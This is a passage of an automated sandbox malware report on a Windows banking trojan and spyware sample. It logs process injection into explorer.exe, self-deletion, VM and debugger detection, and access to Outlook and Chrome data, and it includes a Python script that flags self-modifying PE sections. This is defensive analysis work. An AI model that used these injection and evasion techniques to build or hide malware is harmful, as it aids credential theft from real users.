Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_00112031 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
            Source: C:\Windows\explorer.exeCode function: 23_2_00315014 RtlAllocateHeap,NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_027D1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpi,CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,Process32Next,FindCloseChangeNotification,Sleep,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_027D1819 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_027D1A80 NtCreateSection,NtMapViewOfSection,
            Source: C:\Windows\explorer.exeCode function: 25_2_00E9355C RtlAllocateHeap,NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_00331016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_003315FE lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_00331865 NtCreateSection,NtMapViewOfSection,
            Source: C:\Windows\explorer.exeCode function: 27_2_003F2B00 RtlAllocateHeap,NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027D1EBE RtlMoveMemory,NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_027D1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,FindCloseChangeNotification,Sleep,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_027D18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_027D1B26 NtCreateSection,NtMapViewOfSection,
            Source: C:\Windows\explorer.exeCode function: 30_2_0128370C RtlAllocateHeap,NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 31_2_027D26A9 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 31_2_027D1CEF OpenProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 31_2_027D1C58 NtCreateSection,NtMapViewOfSection,
            Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
Source: 1RMZ62tUAl.exe Virustotal: Detection: 46%
Source: 1RMZ62tUAl.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\1RMZ62tUAl.exe "C:\Users\user\Desktop\1RMZ62tUAl.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\favdejf C:\Users\user\AppData\Roaming\favdejf
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\favdejf
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\AppData\Local\Temp\6128.tmp
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winEXE@15/6@7/2
Source: C:\Windows\SysWOW64\explorer.exe File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\explorer.exe Code function: 21_2_002411EC CreateToolhelp32Snapshot,Process32First,lstrcmpi,Process32Next,CloseHandle,
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Command line argument: \H
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Command line argument: BW?
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Command line argument: lipupacuye
Source: C:\Users\user\AppData\Roaming\favdejf Command line argument: \H
Source: C:\Users\user\AppData\Roaming\favdejf Command line argument: BW?
Source: C:\Users\user\AppData\Roaming\favdejf Command line argument: lipupacuye
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: 1RMZ62tUAl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 1RMZ62tUAl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 1RMZ62tUAl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 1RMZ62tUAl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 1RMZ62tUAl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 1RMZ62tUAl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 1RMZ62tUAl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\rorefeb\45\xabev\wok_kedage 44_dehawovexan.pdb source: 1RMZ62tUAl.exe
Source: Binary string: C:\rorefeb\45\xabev\wok_kedage 44_dehawovexan.pdbP source: 1RMZ62tUAl.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Unpacked PE file: 1.2.1RMZ62tUAl.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\favdejf Unpacked PE file: 10.2.favdejf.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
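The "changes PE section rights" signature compares the section table of the file with the section table of a dump taken from the running process: one listing has a .text section that is executable and readable, the other a .text that is executable and writable, which is the footprint of a stub that decrypts code in place. The Python below is an added example, not code from the Joe Sandbox report or from the sample, that walks a PE section table with nothing but the standard library and renders the rights in the same E/R/W notation the report uses. The two images it compares are constructed header-only inputs that reproduce the two listings above; the report line does not say which listing is the on-disk file and which the memory dump, so the comparison is deliberately symmetric.

```python
import struct

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

SECTION_HDR = "<8sIIIIIIHHI"      # IMAGE_SECTION_HEADER, 40 bytes
COFF_HDR = "<HHIIIHH"             # IMAGE_FILE_HEADER, 20 bytes


def build_pe(sections):
    """Build a header-only PE32 image (constructed test input, not a real binary).

    `sections` is a list of (name, characteristics). The optional header is
    zeroed apart from the PE32 magic, which is all a section-table walk needs.
    """
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 0xE0                                  # PE32 optional header size
    coff = struct.pack(COFF_HDR, 0x014C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)            # IMAGE_NT_OPTIONAL_HDR32_MAGIC
    table = b"".join(
        struct.pack(SECTION_HDR, name.encode("ascii"), 0x1000, 0x1000 * (i + 1),
                    0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, chars)
        for i, (name, chars) in enumerate(sections))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


def parse_sections(data):
    """Return [(name, characteristics)] from the section table of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from(COFF_HDR, data, coff_off)
    off = coff_off + struct.calcsize(COFF_HDR) + opt_size
    out = []
    for _ in range(nsections):
        fields = struct.unpack_from(SECTION_HDR, data, off)
        out.append((fields[0].rstrip(b"\0").decode("ascii", "replace"), fields[-1]))
        off += struct.calcsize(SECTION_HDR)
    return out


def rights(chars):
    """Render MEM_EXECUTE/MEM_READ/MEM_WRITE in the report's E/R/W notation."""
    return "".join(letter for bit, letter in ((IMAGE_SCN_MEM_EXECUTE, "E"),
                                              (IMAGE_SCN_MEM_READ, "R"),
                                              (IMAGE_SCN_MEM_WRITE, "W")) if chars & bit)


def describe(data):
    """Section listing in the same 'name:rights;' form the sandbox prints."""
    return "".join(f"{name}:{rights(chars)};" for name, chars in parse_sections(data))


def wx_sections(data):
    """Sections that are both writable and executable: a self-modifying stub."""
    return [name for name, chars in parse_sections(data)
            if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE]


def changed_rights(image_a, image_b):
    """Names of sections present in both images whose rights differ."""
    a, b = dict(parse_sections(image_a)), dict(parse_sections(image_b))
    return sorted(n for n in a if n in b and rights(a[n]) != rights(b[n]))


# Constructed images reproducing the two listings in the signature above.
IMAGE_A = build_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".data", IMAGE_SCN_MEM_WRITE),
    (".rsrc", IMAGE_SCN_MEM_READ),
    (".reloc", IMAGE_SCN_MEM_READ),
])
IMAGE_B = build_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE),
])

if __name__ == "__main__":
    print(describe(IMAGE_A), "vs", describe(IMAGE_B))
    print("W+X:", wx_sections(IMAGE_B), "changed:", changed_rights(IMAGE_A, IMAGE_B))
```

On a real file, pass the bytes of the executable (or of a process dump that still carries its headers) to `describe()`; a W+X .text in the dump, or a .text whose rights differ between file and dump, is the condition this signature reports. The parser only reads the section table, so it works on the header-only images above and on full binaries alike.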
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Code function: 1_2_00402F29 push 00002ECAh; retf 002Eh
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Code function: 1_2_0042E3F0 push ecx; mov dword ptr [esp], 00000002h
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Code function: 1_2_021F24F8 push D95CF5DBh; retf
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Code function: 1_2_021F3949 push ebp; iretd
Source: C:\Users\user\AppData\Roaming\favdejf Code function: 10_2_00402F29 push 00002ECAh; retf 002Eh
Source: C:\Users\user\AppData\Roaming\favdejf Code function: 10_2_0042E3F0 push ecx; mov dword ptr [esp], 00000002h
Source: C:\Windows\explorer.exe Code function: 20_2_00DF14D4 push esi; ret
Source: C:\Windows\explorer.exe Code function: 20_2_00DF1405 push esi; ret
Source: C:\Windows\explorer.exe Code function: 20_2_00DF47B7 push esp; iretd
Source: C:\Windows\explorer.exe Code function: 20_2_00DFA119 push ds; ret
Source: C:\Windows\explorer.exe Code function: 20_2_00DF9B16 push esp; iretd
Source: C:\Windows\explorer.exe Code function: 20_2_00DFA1B3 push ss; rep ret
Source: C:\Windows\SysWOW64\explorer.exe Code function: 21_2_00242227 push esp; iretd
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_00114FC7 push esp; iretd
Source: C:\Windows\explorer.exe Code function: 23_2_00311405 push esi; ret
Source: C:\Windows\explorer.exe Code function: 23_2_00316198 push eax; retf
Source: C:\Windows\explorer.exe Code function: 23_2_003114D4 push esi; ret
Source: C:\Windows\explorer.exe Code function: 23_2_003170C7 push esp; iretd
Source: C:\Windows\explorer.exe Code function: 23_2_0031CAD8 push esp; iretd
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_027D3417 push esp; iretd
Source: C:\Windows\explorer.exe Code function: 25_2_00E914D4 push esi; ret
Source: C:\Windows\explorer.exe Code function: 25_2_00E945A7 push esp; iretd
Source: C:\Windows\explorer.exe Code function: 25_2_00E91405 push esi; ret
Source: C:\Windows\explorer.exe Code function: 27_2_003F14D4 push esi; ret
Source: C:\Windows\explorer.exe Code function: 27_2_003F1405 push esi; ret
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027D8EB5 push ecx; ret
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027F4E2C push eax; ret
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027F4C63 push eax; ret
Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_027D3627 push esp; iretd
Source: C:\Windows\explorer.exe Code function: 30_2_01281405 push esi; ret
Source: C:\Windows\explorer.exe Code function: 30_2_01284817 push esp; iretd
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E82304 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,
Source: initial sample Static PE information: section name: .text entropy: 7.06143863939
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\favdejf

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\1rmz62tual.exe
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\favdejf:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_001137BC GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 1RMZ62tUAl.exe, 00000001.00000002.357794252.00000000021DA000.00000004.00000020.sdmp Binary or memory string: ASWHOOK0$
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\favdejf Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\explorer.exe TID: 6632 Thread sleep count: 564 > 30
Source: C:\Windows\explorer.exe TID: 6648 Thread sleep count: 261 > 30
Source: C:\Windows\explorer.exe TID: 6628 Thread sleep count: 349 > 30
Source: C:\Windows\explorer.exe TID: 6628 Thread sleep time: -34900s >= -30000s
Source: C:\Windows\explorer.exe TID: 6612 Thread sleep count: 331 > 30
Source: C:\Windows\explorer.exe TID: 1144 Thread sleep count: 131 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 1680 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_001137BC GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 564
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E860B4 GetSystemInfo,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E81EBA FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E82C81 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_001114D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_001113FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027D1939 wsprintfW,FindFirstFileW,lstrcmpiW,wsprintfW,wsprintfW,wsprintfW,RtlZeroMemory,lstrcat,StrToIntA,PathMatchSpecW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027D1FFD FindFirstFileW,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027D217C FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027D1B5B GetTempPathW,lstrcatW,CreateDirectoryW,GetLogicalDriveStringsW,GetDriveTypeW,lstrcatW,CreateThread,lstrlenW,WaitForMultipleObjects,CloseHandle,wsprintfW,CreateFileW,GetFileSize,ReadFile,CloseHandle,DeleteFileW,
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe System information queried: ModuleInformation
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: explorer.exe, 00000006.00000000.336294695.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.322637021.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000006.00000000.336294695.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000006.00000000.332136252.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.332136252.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 00000013.00000002.485190294.0000000003294000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000013.00000002.485190294.0000000003294000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWtion* 6
Source: explorer.exe, 00000006.00000000.336294695.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\favdejf System information queried: CodeIntegrityInformation
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027DCB3A IsDebuggerPresent,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_001137BC GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,
